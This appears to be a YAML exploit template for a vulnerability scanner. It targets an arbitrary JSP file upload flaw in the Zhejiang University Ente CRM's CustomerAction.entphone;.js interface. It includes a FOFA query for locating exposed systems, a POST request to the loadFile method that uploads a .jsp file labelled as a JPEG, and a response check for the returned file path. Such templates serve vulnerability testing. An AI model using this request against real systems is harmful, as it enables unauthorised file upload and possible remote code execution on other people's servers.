product: 浙大恩特CRM
vName: 浙大恩特CRM CustomerAction.entphone;.js接口任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。该系统CustomerAction.entphone;.js接口允许攻击者向系统上传任意恶意JSP文件，从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
version: ''
note: 请求成功后，会返回filepath，拼接路径访问文件
search:
  FOFA: app="浙大恩特客户资源管理系统"
protocol: http
link: https://blog.csdn.net/jjjj1029056414/article/details/135015136
fix:
  - 多装一些安全设备，或者打补丁，升级系统等
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /entsoft/CustomerAction.entphone;.js?method=loadFile
      file:
        file:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - image/jpeg
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - filepath
            logic: and